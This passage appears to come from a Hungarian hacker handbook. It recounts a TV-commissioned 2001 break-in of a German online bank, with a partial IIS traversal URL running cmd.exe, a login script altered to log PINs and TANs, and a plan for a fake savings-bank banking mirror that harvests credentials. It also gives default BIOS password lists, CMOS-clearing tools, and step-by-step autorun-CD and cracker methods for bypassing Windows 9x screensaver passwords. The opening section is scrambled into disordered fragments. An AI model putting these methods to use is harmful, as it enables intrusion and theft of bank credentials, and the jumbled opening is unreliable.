l . Végül a fájlt törölni kellett.de/scripts/.vagy 10-jegyű online számukat. az SSL miatt) tárolja a rendszer. Alapvetően az echo DOS-paranccsal lehet fájlokba írni. Azonosítás és kapcsolat A weboldalakhoz vezető útvonal így nézett ki: C:\Inetpub\Root\Bank. Ebben a könyvtárban volt azoknak a fájloknak a nagy része. hogy az első lépés már el volt intézve. ezeket nem lehetett a böngészőn keresztül bevinni. Ez azonban meghiúsult azon.EXE-t a /c paraméterrel (egyedüli parancs) futtatták. Figyelembe kellett venni. ahhoz először a webkönyvtárba kellett másolni. Az olvasási elérés nem volt probléma: az olvasandó fájlokat a webkönyvtárba másolták. meg lehet írni a CMD. Az utolsó és legnagyobb dobás az volt. A cookie-t mint HTTP_COOKIE-t tárolták. hogy egyszerűen féltőkének egy trójait.7 Az adatletöltés A megváltoztatott scriptek a C:\Temp\ 000043FA.exe Itt egy hibáról volt szó egy átadott parancs dekódolásánál és legitimációjánál. például a CMD. és a sorok „komplex" módon épülnek fel. ezért egyfajta shellt kaptak a böngészőn keresztül. ha a CMD. mint pl. A támadási tervről Bináris fájlokat ASP-scripttel írnak. A bökkenő az írás volt. hogy ez a folyamat ne legyen olyan könnyen felfedezhető. Az ASP-scriptet. hogy gépeljék be 6. 1. hogy a bejelentkező adatok a felhasználói űrlapról közvetlenül egy logfájlba vándoroljanak. majd törölték.EXE-t. PIN kódjukat. Megjegyzés: az adminisztrátor ezt a könyvtárat könyörtelelnül törölhette volna. Ezeket az adatokat aztán egy Session Cookie-ban (kódolt. Az adatok. Az IIS „sípolta" a konzolfájlok kiadását.EXE-vel.. Az ügyfeleket felkérik. ami végrehajtáshoz vezet. és ezzel felhasználhatók más alkalmazások számára is. hogy a metakaraktereket idézőjelekbe csomagolva a szintakszisnak megfelelően írták (az ASP-scripthez). A szövegkarakterekkel nem is volt gond. A szerver támadhatóságának tesztelése A webszerver egy fatálisán szabványos exploitra volt érzékeny: http://www. át lehetett írni a bejelentkező-scriptet úgy. hogy tiltva voltak a kimenő kapcsolatok. ami azután kényelmes olvasási és írási elérést kínálna.3. és ezért a legrosszabb esetben háromszor olyan nagy lehetett volna. Mivel azonban az ASP-hez és a HTML-hez is metakarakterek szükségesek. amelyeket az online banki szolgáltatás használ. amelyeknek a webszerver a környezete.ini könyvtárban tárolják a bank ügyfeleinek folyószámlaszámát. Amint a feltöltő-script a szerveren volt. mint például a HTTP_AGENT vagy a Remote-IP minden kérdésnél.. letöltötték. majd egy hiperhivat-kozáson keresztül lehetett letölteni. amely szövegkarakterekből áll. Tehát engedélyezett kapcsolatból kellett olvasni és írni. és ezután az echo+%HTTP_COOKIE% -val egyszerűen lehetett írni. A sorokat tehát cookie-ként küldték el. amelybe csak egy kódolt kapcsolattal lehet bejutni.%c255winnt/system32/cmd. illetve töltenek fel. Tiltott kimenő kapcsolatok Az első terv az volt. illetve nincs szükségük ilyenekre.: <. viszont bináris adatokat és metakaraktereket. Hogy ezt a fájlt le lehessen tölteni.. Ebben a könyvtárban volt egy alkönyvtár. és ezért itt már nem kellett foglalkozni vele! . környezeti változóként tárolódnak. a sok nem alfanumerikus karakter miatt.böngészőből. mivel a sornak URL kódoltnak kellett lennie. PIN-jét és IP-jét.> nem lehetett írni.. mivel a bank scriptjei nem hajtanak végre bináris fájlokat. és a kívánt bankot (a •••-t vagy a •••-t).

amelyben úgy ítéltek. ahol bezárták egy széfbe ezeket.4 Utóirat a bank-hackeléshez A logfájlok áthúzása 2001. hogy egy pillantást vessenek az ügyfelek részvényletétjére. amelyet egy semleges közjegyzőnek adtak át Hamburgban.08. Ebben az időben több mint 1. 1. 1. A •• bank a Hamburgi Területi Bíróságon 2001.04-én elérte.A Bank. Az NDR bizonyítékként csak egy másolatot tartott meg.31-ig folyt. Egy folyószámla képernyője Egy részvény-portfólió képernyője S még arra is nyílt lehetőség.04-től 2001. pineket. hogy minden adatot vissza kell szolgáltatni nekik.10.dat képernyője A logfájlokból kapott adatokkal most már be lehetett jelentkezni az ügyfelek folyószámlájára. hogy Ideiglenes Intézkedést adjanak ki.5 Összefoglalás Az említett eseményeket követően a könyv szerzője elbeszélgetett az ismert német biztonsági .5 millió adatot (online számokat. Az adatokat végül az NDR jogi osztályának adták át. IP-címeket) mentettek le. és ott egy széfbe zárták. 08.

Azután van egy félig nyilványos terület. amelyet mindenki elérhet (WWW/HTTP). és információkat töltsenek le az ügyfelek számláiról. akikre utalt. „A (bankszámla) információkkal. NÉMETORSZÁG 2001. tűzfal-elemek és Intrusion Detection System) a pénzügyi szektorban aránylag gyakran a rendelkezésre áll (ellentétben más terület hálózati kapcsolattal működő cégeivel). 4:51 ••••. Az információk neveket. Az „ők".newsbytes. de most a kamera mögött dolgozik. hogy betörjenek a ••• online banki szerverébe. . Ezeknek az adminisztrációja is többnyire jó . a Technikai Tanácsadó nevű tv-show." Azt mondta. hogy feltörjék a bank online banking szerverét. ahová csak az ügyfelek léphetnek be megfelelő azonosítást követően (WWW/SSL/SHTTP/ jelszóvédelem). amelyek fontosak a biztonságos online banki szolgáltatáshoz. 17. hogy a legszívesebben abban a minutumban mondtam volna fel a folyószámlámat.. számlaszámokat. hogy mondjam: vannak ilyenek és olyanok is. Ruef pontosan ismeri a gondot. Ebben az összefüggésben újra és újra előkerült a biztonság kérdése. én 30 éve csinálok törvénytelen dolgokat. az e~banking. íme két érdekes vélemény. A Technikai Tanácsadó augusztusban felfogadott néhány fiatalembert. Ezzel azt akarom mondani. Voltak pereim ezelőtt is. a bank szóvivője szerint jogi lépéseket tervez egy népszerű fogyasztói high-tech tv-show ellen. Számtalan újság és rádióállomás számolt be az akcióról. Bernd Leptihn.kezekben van. Mindenesetre bőven van még tennivaló. Marc Riief-fel. mivel nincs meg a szükséges háttértudásuk. ezt nyilatkozta a Newsbytes-nak: „Amit tettek. Leptihn. hogy van egy nyilvános rész. biztosított rendszer. és ez meg is történik (a legújabb patchek.de sajnos nem nagyon jó . amelyek kitűnő kompetenciával tűnnek ki. A megfelelő szoftver és hardver a naplózáshoz és a biztonsághoz (pl. A sztorit vasárnap este közvetítették.szakértővel. Newsbytes MÜNCHEN. Nem szabad valamennyit egy kalap alá venni. millió és millió euró birtokában" mondta. mivel néhány nagy bank biztonsági tanácsadója. A következőket mondta: „Sok bank webes fellépése megosztott. aki amúgy jól ismert személyiség Németországban. A nyilvános részt elhanyagolhatják. de mostanáig soha nem vesztettem el egyetlen ügyet sem.com tudósításai Német tv-s hackerek bankszervert törtek fel per van kilátásban Ned Stafford. És persze vannak olyan intézmények is. a ••• müncheni szóvivője. ami gyakran így is történik (nem viszik túlzásba a biztonsági mechanizmusokat és irányvonalakat).. amelyeknek a birtokába jutottunk. a nyilvánosság informálása a ••• számítógépének hiányosságairól nagyon is a köz érdekében történt. Az erre hivatott rendszeradminisztrátorok. az törvénytelen. biztonsági megbízottak vagy auditorok nem tudnak mit kezdeni a biztonsági rendszer logfájljaival. aki 27 éve a Technical Adviser frontembere. A www.washingtonpost.. Ösz-szességében azt kell. Cornelia Klaila.6 Sajtóbeszámolók A bank-hackelés világszerte nagy visszhangot keltett. Szerintem a bökkenő a kiértékelésnél van. ha az „a köz érdekét szolgálja". így ékelődött: „Tudják. erős irányvonalak." 1. amelyet az ARD. Nagyon törvénytelen. megfelelő biztonsági intézkedések). hogy az ARD jogi részlege szerint az ilyesfajta oknyo-mozó újságírást megengedi a német jog. Az e-banking területet védeni kell.com és a www. hogy nem aggódik a ••• perindítása miatt. Leptihn szerint. Láttam már olyan banki számítógépeket. Németország két közszolgálati tévéhálózatának egyike gyárt. du. most akárhol is lehetnénk a világban. PIN-számokat és internetes IP-számokat tartalmaztak. a bankok biztonsági problematikájáról. amely hackereket szerződtetett. a Technikai Tanácsadó (Ratgeber Technik) hírszerkesztő csoportjának hamburgi vezetője azt nyilatkozta a Newsbytes-nak. szept. Németország egyik legnagyobb bankja.

a régi és az új is online-ban voltak. De elvileg sok más banknál és takarékpénztárnál is lehetséges lenne egy virtuális betörés.vélekedett. ami biztonságos.0) használta. A bank a Microsoft Internet Information Serverét (IIS 4. mit is akarunk tenni. 2001. és sikerrel jártak" -állította. hogy mennyit fizettek nekik. hogy elveszítik az állásukat." Weide és Leptihn elmondták. az online-számokat (TAN) és az IP-címeket. 08:46 óra Thüringiai hackerek a Ratgeber: Technik ARD-magazin megbízásából." Miután a Technikai Tanácsadó vasárnap éjszaka a tévében megszellőztette az ügyet. A Technikai Tanácsadó megbízott egy négytagú hackercsapatot. Négyük közül az egyik Stephan Weide.. hogy publicitást nyerjenek induló internetes biztonsági tanácsadó cégüknek . A zdnet. bárki meg tudta volna tenni. Leptihn viszont vitatta. Még egy laptoppal és egy adatátvitelre alkalmas mobiltelefonnnal is gond nélkül lehet jogosulatlanul pénzt átutalni. hogy a weboldalt a szokásos rendszeres karbantartás és nem a biztonsági rések kijavítása miatt állították le. „Még el kell döntenünk. Klaila azt mondta. Augusztus hónap folyamán . hogy a ••• bank ezen a nyáron egy új online weboldalt helyezett üzembe.de News tudósítása ARD: Online banki szolgáltatásbeli hiányosságokat lepleztek le PIN-eket és TAN-eket olvastak ki bekapcsolt kamera előtt." . hogy az új oldal az utolsó éjszaka előtt biztonságos lett volna. beleértve titkos kódokat (PIN). hogy a betörés a ••• számítógépébe csak két-három napot vett igénybe. A tévéadó komputeres szakemberei ismételten óvtak a trójaiktól. amelyek értelmetlenné teszik a pénzintézet kódolási eljárását. hogy a technikaiak hangot adtak-e haragjuknak a hackelés miatt. A fiatal hackerek inkább abban voltak érdekeltek. s így. hogy megmondják nekik.t választották. hogy bűntetőjogi és polgári peres kártérítési per is lehetséges a Technikai Tanácsadó ellen. és hogy ez az oldal state-of-the-art rendszer. Weide azt mondta. de ez „nem volt sok". Azt is jelezte. hogy a kutatás megmutatta. és a hackerek a régi weboldalra. hogy a ••• online banking oldala vasárnap késő éjjeltől kezdve úgy hat órára leállt. Behatolásuk bizonyítására a betolakodók csupán egy 100 márkás könyvelésre „korlátozták magukat". azt mondta: „Nem mondtak csúnya szavakat. és „igazán nem volt gond. ezt nyomatékosan kétségbe vonta. hogy a ••• banknál bizony van néhány nagy biztonsági rés. Az adó által felfogadott hackerek azonban ebben az átdolgozott programban is találtak réseket. így a szerkesztőknek és a szakértőknek a műsor adatai szerint lehetővé vált néhány napon belül 1. egy új log-in redszert vezettek be. hogyan tudják befoltozni a réseket. és nem az újra törtek be. Ahogy az ARD a továbbiakban közölte. mert ez a bank különösen „lukacsosnak" bizonyult a jogosulatlan hozzáférésekkel szemben. a számlákat a kimerítésig terhelhették volna. 1. a bank szóvivője. Mikor megkérdeztük. Azt hiszem. Weide azt nyilatkozta a Newsbytes-nak.Leptihn arra is utalt. Klaila. „A hackereink ismét próbálkoztak az új site-on. 22 évesen a Multimedia Network Systems cég ügyvezetője Leinefeldében.mondta.mint mondta mindkét oldal. féltek. más bankoknál is csak félig-meddig . Miután a magazin figyelmeztette a •••-t központi számítógépének a hiányosságaira. Azt nem árulta el.7 Tapaszatalatok más bankoknál Nem csak a ••• nincs felvértezve a támadások ellen. A régi weboldalt szeptember elején offline-ba helyezték. szeptember 17. s azt állította. A Ratgeber szerkesztősége szerint azért a •••. működő kamera előtt törték fel a ••• biztonsági mechanizmusait.5 millió online könyvelési akciót megszerezni. hogy ő és a csapata részt vettek egy telekonferenciás hívásban a ••• technikai személyzetével. a hackereknek dispo-kredit adatokat is sikerült elérniük.

A tapasztalatokból.1 Forgatókönyv a takarékpénztár-területen 2001 októberében a szerző újabb megkeresést kapott valakitől. és ki lehet indulni abból. amely csak nagyon egyszerűen védett. Ez általában egészen egyszerű felépítésű.7. Ezt a takarékpénztáraknál gyakran számítóközpontok kezelik. amelyek nagyon támadhatóvá teszik a szervert. hogy egy támadás ez ellen a számítógép ellen semmiféle sikerrel sem járna. Ezen a webszerveren gyakran tisztán reprezentatív célokból futnak olyan alkalmazások. amelyben az ügyfél az illető tararékpénztárról információt szerezhet. mint a legtöbbnek Németoszágban: két részből áll.a kleinmusterhauseni takarékpénztár Ennek a tararékpénztárnak olyan az internetes megoldása. aki a különböző bankok visszásságainak a feltárására tararékpénztárak biztonsági auditjával bízta meg. egy maghatározott URL begépelésével Itt az átmenet a home-bankinghoz . Nyíltszívűen . a következő terv született. és amelyen keresztül egy linkkel a folyószámlájához jut. 1. Van a nyilvános rész. A szerverek többnyire jól védettek. A második terület a tulajdonképpeni e-banking. és a rendszergazda is szívesen elhanyagolja. Bepillantás egy német tararékpénztár jelszó-fájljába. amelyeket az előző akciókból gyűjtöttek.sikeresek a szerverük védelmére irányuló intézkedések. Többnyire egy helyben lévő vagy szolgáltatón keresztül kezelt szerverről van szó.

amelyen többnyire HBCI-eszközök meghajtóit vagy különböző online banking szoftverek frissítéseit tárolják. A betörés után megváltoztattak minden oldalt. Isten hozta a tararékpénztárnál -csak az URL-nek kell a megfelelőnek lenni Példa egy tararékpénztári oldal forrásszövegére megfelelő linkeléssel a számítógép-központhoz A hamisítvány veszi át a szerepet A megfelelő oldal külleméről és működési módjáról rendelkezésre álló információk alapján . amely lehetővé teszi az illető bank. Ez ebben az esetben egy script-hiba vagy egy hibás FTP-szerver lenne. illetve takarékpénztár nyilvános szerverének az elérését. amelyek a számítóközpontban elhelyezett tulajdonképpeni e-banking gépre mutattak.A támadási terv Először egy biztonsági rést próbáltak keresni.

mint a valódi e-banking gépen. ezek az adatok egy logfájlban landolnak. Ez a hamisítvány a tuljdonképpeni e-banking számítógépet „tükrözné".hozzákezdtek egy hamisítvány felépítéséhez. tehát az ügyfeleket a helyi tararékpénztár prezentációjáról a megváltoztatott Folyószámla vagy Onlinebanking link közvetlenül a hamisítványra vezeti. „A kockázatokról és mellékhatásokról kérdezze banki tanácsadóját!" . a tranzakciószámok továbbra is érvényben maradnak. Az ügyfél ugyanazokat az információkat és opciókat látja maga előtt. hanem csak a logfájlba vándorol. Mivel a tranzakciók egyike sem lesz végrehajtva. Ha most egy átutaláshoz beírja az adatokat.

2.1.1 A fájl. fejezet . az NT és utódai között 2.vagy hálózati felhasználók.veszélyes biztonsági rések 2.merevlemez-fejreállás.3.2 A jelszófájlok 2.1 A hackeren túl . vigyázat! 2.a bennfenteseknek nem okoz problémát 2.1.2.2. adatbetekintés vagy lopás 2.3.3 Jelszavak a Windows 2000 alatt 2.4 Automatikus lejátszás .4 További támadási technikák .3.és nyomtatómegosztás .1 Érdekes jelszavak szinte mindenütt akadnak 2.1.2 Mik azok a szkennerek.3.4 Jelszóval védett megosztások 2.Tartalom 2.3.2 A jelszavak kikémlelése 2.1.3 Képernyővédő-jelszó .3.3 Milyen lehetőségeik vannak a betolakodóknak? 2. és hogyan működnek? 2.5 Brute Force-rohamok a megosztási jelszavak ellen 2.2 A fizikai támadás 2.a betörés előkészítése CD-vel 2.3 A távoli elérésű támadás internet.6 Óvintézkedések 2.2.1 Különbségek a Windows 9x.

ami sok .0 és Windows 2000) tervezésénél sokkal tudatosabban koncentrált erre a témára. Az NT vagy a Windows 2000-es gépeknél ott van még a jelszavas bejelentkezés. mielőtt a grafikus felület megjelenne. És akkor a további kockázatokat. lopás stb. adatbetekintés vagy lopás A biztonság tulajdonképpen az adatok biztosítási lehetőségeinek az alapvető mérlegelésénél kezdődik.1 Különbségek a Windows 9x. például egy lopásét. Sajnos. Míg a Windows 95/98/ME fejlesztésénél a Microsoft a felhasználóbarátság kedvéért elhanyagolta a biztonságot. ez a fejezet az adatbiztonság egészével foglalkozik. A Windows 95/98/ME-t érő támadásoknak két fajtáját kell megkülönböztetni. A magánfelhasználók. A Windows 95/98/ME felhasználóinak (és valószínűleg azok nagy részének is.és még a legfifikásabb BIOS-jelszó sem ér sokat. Hogy mennyire biztonságosak a jelszóval védett képernyőkímélők. 2. azt a későbbiekben megmutatjuk. vagy a kényelem kedvéért lemondanak a BIOS-jelszóról. még figyelembe se vettük: ugyan ki szeretné az utolsó adóbevallását vagy bizonyos leveleit rossz kezekben tudni? Az egyedülálló PC-t ugyan inkább a külső hatások (vírusok. amelyeknek az elvesztése. az NT és utódai között A különböző operációs rendszerek közötti alapvető különbség. és vele együtt a BIOS. ami a BlOS-jelszónál kezdődik.1. Emellett az NT-nél és a Windows 2000-nél az adatokat már eleve zárolni lehet. hogy ezt a védelmet megkerülve jussanak be a rendszerbe. de gyakran még a vállalatok is visszariadnak egy jó tűzfal költségeitől.A Windows-rendszerek (9x. amelyeknek az adataikat kiteszik. az XP-vel fog megszűnni: az eddigi Windows 9x vonal csak korlátozott védelmet (BIOS-jelszó) kínál a jogosulatlan felhasználás ellen. Manapság szinte minden számítógép-használónak vannak olyan adatok a gépén. hogy behatoljanak a rendszerekbe.1 A hackeren túl . annál könnyebb kikerülni. ami igazán csak most. akinek közvetlen elérése van a rendszerre.esetben egyáltalán nem történik meg. Így a felhasználók ezekkel az operációs rendszerekkel a jövőben is könnyű prédái lesznek mindenfajta hackertámadásnak. amely növeli a biztonságot. a hackereknek arra is vannak módszereik.merevlemez-fejreállás. a professzionális területre készült termékek (Windows NT 4. Alapigazság. és azokról a veszélyekről. A hackereket egyenesen csalogatják a gyenge pontok. amelyet az internetről indítanak.) vagy a hibás kezelés veszélyezteti. illetve feltörésének három alapvető módját különböztetjük meg: • általános jelszó használata a jelszó megszerzése a memóriából • a CMOS szoftverének törlése . Az egyik a fizikai támadás. a másik a távoli elérésű támadás. amelyet a felhasználónak a számítógép minden indításához be kell írnia.1. mint köztes fokozat. amit olyan valaki hajt végre. A BIOS-jelszavas lezárás megkerülésének. ennek ellenére rengeteg más lehetőség is van hozzáférni a személyes adatokhoz: otthon vagy az irodában alapvetően mindenki odaülhet a géphez .2 A fizikai támadás A számítógépek védelmének nem túl gyakori módja a BIOS-jelszó beállítása. hogy minél öregebb egy számítógép. NT. 2. illetve feltörni a védelmet. Ráadásul a felhasználói operációs rendszerek gazdái is nagyon megkönnyítik a támadók dolgát. Mivel az adataink nem csak az internetes szörfözés közben vannak veszélyben. illetve az újbóli előállítása a PC árának többszörösébe kerülne. akik a Windows XP Home Editionnel fognak dolgozni) többnyire csak csekély ismeretei vannak a biztonságról. ha 2. 2000) gyenge pontjai a számítógép ebédszünetben bekapcsolva marad. ami a 9x-nél kiegészítő szoftvertől függ.a legtöbb? .

Ezekkel a jelszavakkal a számítógépet az utoljára használt és mentett jelszótól függetlenül lehet elindítani.Általános jelszó használata A különböző BIOS-verziók gyártói adnak egy általános vagy default jelszót. és azzal együtt a jelszót is. amelyeket könnyen be lehet szerezni az internetről.hackerzbook. ezek közül az egyik legismertebb a KiLLCMOS32. de valójában a legtöbbnél kérdéses.I. Ez a segédprogram minden beállítást töröl. a használatuknál azonban figyelni kell az amerikai billentyűzetkiosztásra.hackerzbook. ha a biztonságáért aggódó felhasználó egyszer el találná felejteni a jelszavát.de www. Azt persze figyelembe kell vennie. ilyenkor ugyanis segédprogramokkal el lehet érni a memóriában tárolt jelszót.hackerzbook. Gyártó: Award BIOSSTAR BIOSTAR ALFAROME q_127&z J64 Password-BlOS-Hacker Oren Levytől Program AMIDECOD Award Modular Bios crack tool CrackAmiBios 1. Mindenesetre a rendszernek már futnia kell a használatához. arra az esetre. hogy ilyenkor a rendszerbeállítások is elvesznek.de AMI Award Gyártó: AMI PASSWORD Ami A. nem marad más hátra.M. Ezeket a jelszavakat számos oldalról be lehet szerezni az interneten.de www. hogy a gép már elindult.1 Password for AWARD BIOS BIOS Szerző Danny Soft The Immortal Ismeretlen Oren Levy . A különböző BIOS-verziókhoz különböző programok vannak. A BIOS törléséhez megint csak segédprogramokat használnak a „betörők". A KiLLCMOS32 minden BlOS-beállitást megbízhatóan töröl CONDO awkward BIOSTAR A jelszó megszerzése a memóriából A jelszó memóriából történő megszerzése feltételezi.hackerzbook.de www. vagy már teljesen elavultak.de www. AMI?PW AMI?SW AMI_SW AMI Gyártó: Phoenix PHOENIX phoenix CMOS BIOS Altalános jelszavak aLLy Wodj SZYX Syxz Sxyz SKY_FOX setup AMI általános Password (C)alculator AWARD J262 J256 j262 j256 AWARD_SW 589589 AWARD_PW AWARD_PS AWARD?SW AWARD SW AWARD 589721 Általános BlOS-jelszavak Programok a jelszó kiderítéséhez a memóriából SER LKWPETER Ikwpeter HLT A CMOS szoftverének törlése Ha a hacker nem talál általános jelszót vagy megfelelő segédprogramot. Ezeknek a jelszavaknak a többségét sikerrel teszteltük.Dynam ic FalCoN 'N' AleX Forrás www. . mint törölni a BIOS-t.hackerzbook. hogy vajon még működnek-e. és minden BIOS-verzióhoz használható.

A program egy érvénytelen értéket helyez el a CMOS-ban, és ez úgy hat, hogy minden ott tárolt adatot (a jelszót is) újra meg kell adni. A használatának a feltétele azonban az, hogy a számítógép már működik, és szabad a hozzáférés. A http://www.memosys.com/passwort/faq.htm címen további információk találhatók a BIOS-jelszavakról. A jobban informált internet-felhasználók néha azt hiszik, hogy egy rendszert csak az internetről érhetnek támadások, és ez ellen egy tűzfallal jól meg is védik a gépüket. De mi van akkor, ha valaki mondjuk az ebédszünetben fizikailag fér hozzá a számítógéphez? Milyen módszereket fog alkalmazni, hogy kikerülje a képernyővédőt és jelszavakat olvasson ki?

A Windows a jelszó megerősítését kéri

2.1.3 Képernyővédő-jelszóa bennfenteseknek nem okoz problémát
Hogy a számítógépünk rövid távolléteink alatt is védve legyen a kíváncsi szemektől, arról a Windows 95/98/ME alatt a legegyszerűbben képernyővédőjelszóval gondoskodhatunk. Ez a képernyővédő bekapcsolása után csak a megfelelő jelszót megadó felhasználónak engedi meg a rendszer elérését.
Ha a Windows csővezetéket épít vagy Beziergörbéket mutat - csak jelszóval lehetséges a visszatérés

így lehet feltörni a jelszóvédelmet
Az alábbiakban megvilágítjuk, milyen könnyű egy képernyőkímélő jelszavát kikapcsolni, illetve kikerülni, ha a hackernek ehhez elég ideje és tudása van.

Újraindítás
Windows 95/98/ME alatt a Képernyő tulajdonságai ablakban a Képernyőkímélő regiszterlapon a képernyőkímélő bekapcsolása után zárolni lehet a rendszer elérését. Ha mások is hozzáférnek a PC-nkhez, alapvetően be kell állítanunk ezt a jelszót, mert különben könnyen űzhetnek velünk csúnya tréfát: képzeljük el, hogy valaki három perc után induló jelszavas képernyővédőt állít be a gépünkön. Ezután elég egy rövid szünet (telefon vagy hasonló), és máris megakasztotta a munkánkat. Hiszen jelszó híján nem jutunk a PC-hez újraindítás nélkül. Akkor viszont elveszhetnek az adatok, amelyeket esetleg még nem mentettünk el - nagy az ár. Igazán dühödt, primitív, de hatásos módszer a képenyőkímélő-jelszó kikerülésére: a számítógép újraindítása a rését gombbal. Figyelembe kell venni, hogy a nem mentett adatok minden esetben elvesznek, így például a nem mentett Word-dokumentumok vagy a nyitott fájlok stb. Szerencsére ilyenkor a rendszer felhasználója észreveszi a behatolást.

Taskmanager - kapu a betörőnek Windows 95 alatt
Windows 95 alatt a Microsoft még egyszerűbb módot kínál a képernyőkímélő kikerülésére: a Ctrl+Alt+Del billentyűkombináció lenyomásával • mondhatni „majomfogással" - célzottan be lehet zárni a képernyőkímélő program taskját.

Rossz csillagzat alatt született a védelem: egy egérkattintással be lehet zárni a képernyőkímélőt

A Windows 95/98/ME a CD-ROM-meghajtóhoz alapértelmezésként az autoplay (automatikus lejátszás) opciót használja, amelyet a Microsoft Knowledge Base Article Q141059 a következőképpen definiál: „A Windows folyamatosan ellenőrzi a CD-ROM-meghajtót, hogy megállapítsa, helyeztek-e bele CD-ROM-ot. Ha ilyen lemezt fedez fel, ellenőrzi, hogy van-e rajta autorun.inf-fájl. Ha a CD tartalmaz ilyen fájlt, akkor végrehajtja a fájl open= sorába írt parancsokat." Megjegyzés: ezt a témát még a 4.fejezet is tárgyalja, mert az automatikus lejátszás funkciót gyakran használják trójai vírus becsempészésére idegen rendszerekbe. Ehhez lehet a rendszer esetleg futó internetkapcsolatait (vagy hálózatoknál a LAN-kapcsolatokat) használni, és így a PC-hez a képernyőkímélő-jelszó ellenére hozzá lehet férni. Ha a trójai már bent van, a képernyőkímélő-jelszót egészen egyszerűen ki tudja kerülni. Egy ilyen hozzáféréssel a képernyőkímélő-jelszót is ki lehet kapcsolni úgy, hogy: HKEY_CURRENT_USER/Control Panel/desktop/ScreenSaveActive Registrykulcs értékét nullára állítjuk. Van néhány program, amelyeket az automatikus lejátszás funkcióval, a jelszómegadást kikerülendő, fel lehet másolni. Ezeknek a programoknak egyike a Clean Screen. Íme, a használati utasítás, amellyel szükség esetén magunkat is kiszabadíthatjuk (az előkészületeket azonban előre meg kell megtenni, nehogy túl késő legyen): 1. Letölteni (www.hakerzbook.de) és kicsomagolni a ZIP fájlt! 2. Az EXE fájlt és az autostart-ini-t CD-re írni. A két fájlnak a könyvtárfán egészen felül kell lennie, tehát ne valamilyen alkönyvtárba másoljuk. 3. Ha a CD-írás elkészült, akkor egyszerűen próbáljuk ki egyszer a saját PCnken. 4. Képernyőkímélő-jelszó beállítása, majd várakozás, míg a képernyőkímélő elindul. 5. Tegyük az újonnan megírt CD-t a meghajtóba, és várjunk, amíg a PC hangszórója sípolni kezd. Ha nincs bekötve, egyszerűen várjuk ki, míg a CD-ROM-meghajtó leáll. 6. Ezután már csak írjuk be a jelszó lekérdezésére az 123-at, és a képernyőkímélőnek el kell tűnnie!

Védelmi lehetőség Windows 95 felhasználóknak
Ez ellen a támadás ellen csak a Windows 95 Windows 98/ME-re frissítése nyújt védelmet. A képernyőkímélő-jelszó elkerülésének ilyen kísérletei az NT/2000-nél is hatástalanok. A későbbiekből az is ki fog derülni, hogyan is lehet feltörni az ilyen jelszót, mert a jelszavas védelem is csak korlátozott mértékben nyújt biztonságot. A jelszó megfejtése a megfelelő szoftvereszközzel igazán egyszerű, jobb, ha tudjuk, hogy mennyire az. így persze rögtön magunkon is segíthetünk, ha elfelejtettük a saját jelszavunkat.

2.1.4 Automatikus lejátszás a betörés előkészítése CD-vel
A PC-t a BIOS-szal, a képernyőkímélőt jelszóval zároltuk, és talán még a jelszót is úgy választottuk meg, hogy az betűk és számok kombinációjából álljon - most aztán a PC-nk szünetben is bevehetetlen, vagy lehet, hogy mégsem? A következőkből kiderül, hogy milyen eszközöket vethet be ebédszünetben egy potenciális hacker, hogy minden igyekezetünk ellenére hozzáférjen az adatainkhoz.

7. Ezután a program kiírja a régi jelszót, és a Régi érték beállítása paranccsal vissza lehet állni rá. Ha ezt nem tesszük meg, aktuális jelszóként a 123-at tárolja.
A képernyőkímélő-jelszó megszerzése autoplay CD-vel

A képernyőkímélő jelszó kikódolása A képernyőkímélő jelszót a Windows 95/98/ME alapértelmezésként a HKEY\USERS\.Default\Control Panel\Sreen_Save_Data Registry-kulcsban tárolja. A kódolása nagyon egyszerű, és számos programmal feltörhető. A legtöbb programnak az a hátránya, hogy csak akkor működik, ha a képernyőkímélő még nem aktív (hogy mit tehetünk, ha már az, azt már tudjuk).
Jelszófeltörő program működés közben

Védekezés az automatikus indításos támadások ellen Ezeket a támadásokat úgy védhetjük ki, ha a Windows 95/98/ME alatt kikapcsoljuk az automatikus lejátszás funkciót. Ez a következőképpen működik: A Vezérlőpulton kattintsunk duplán a Rendszerre, válasszuk az Eszközkezelő fület, kattintsunk duplán a CD-ROM-ra, és aztán a CD-ROM meghajtófára. A Beállítások regiszterlapon távolítsuk el a pipát az Automatikus lejátszás elől.
Itt találjuk a döntő fontosságú pipácskákat

Néhány program a képernyőkímélő-jelszó feltöréséhez:
Program SCR-it! - 1 .0 verzió SCRNLOCK SS_D 1.0 Win95 Screen Saver Password Cracker v1 . 1 Programok a képernyőkímélő-jelszó feltöréséhez Szerző Yoto Yotov Yoto Yotov Bubble nobody weboldal www.hakerzbook.de www.hakerzbook.de www.hakerzbook.de www.hakerzbook.de

2.2 A jelszavak kikémlelése 2.2.1 Érdekes jelszavak szinte mindenütt akadnak
A helyi támadásoknál nagy szerepe van a jelszavak kikémlelésének. Jelszófeltörők segítségével a hackerek szinte minden, Windows alatt tárolt jelszót meg tudnak szerezni, hogy azután elérjenek velük jelszóval védett fájlokat, az

Az Internet Explorer a 4. hogy hozzáférjenek ezekhez az információkhoz. Jelszavak ezreit törték fel de. íme egy aktuális példa: 2001. a telefonos kapcsolat jelszavai és a Windows bejelentkező nevek. a PWL fájl nevejani. A hackerek a jelszavakat még az idevágó weboldalakon is nyilvánossá tehették . Erre egyszerű példák találhatók az Internet Explorernél és a telefonos kapcsolatnál. a Microsoft nagyon megkönnyíti a betolakodóknak. a felhasználó költéségén szörfözhet az interneten. tehát a c:\windows\ alatt. így tárolódnak például a meghajtók és a nyomtatók hozzáférési jelszavai. A Windows 95/98/ME alatt minden program eléri a PWL fájlokat. akik mit sem sejtő PC-tulajdonosok költségére szörföztek az interneten. hétfő . A kódolt jelszó az első pillantásra még ártalmatlan Németország: Hackerek milliós csalása A nyomozók hackerek nagy szabású csalásainak a nyomára bukkantak. Münsterben már 3600 nyomozási eljárás lezárult.. illetve ezek bizonyos területeit.pwl lesz. a fájlnév pedig a mindenkori felhasználó neve lesz.2.az automatikus kiegészítés A dortmundi államügyészségnél több mint 1000 eljárás van folyamatban gyanúsítottak ellen egész Németországban. az adatokat kiolvasva. Sajnos. mert akár odáig vezethet. Ezek az ügyek azonban az államügyész adatai szerint már egy fél évvel ezelőttiek. Példa: ha a Windowsba Jani néven jelentkezünk be. hogy szeretné-e menteni ezeket. 10:30 . Praktikus segítség a felhasználóknak és a betörőknek . amely a belépési adatok megadása után megkérdezi a felhasználótól. Különösen veszélyes ez a telefonos kapcsolatnál. .silicon. A Windows minden PWL-fájlt a Windows könyvtárban tárol.2 A jelszófájlok A Windows 95/98/ME PWL fájlokban tárolja a jelszavakat és a felhasználói neveket.számol be a Der Spiegel hírmagazin nemrégiben megjelent tudósítása.mondják. Minden felhasználói profil 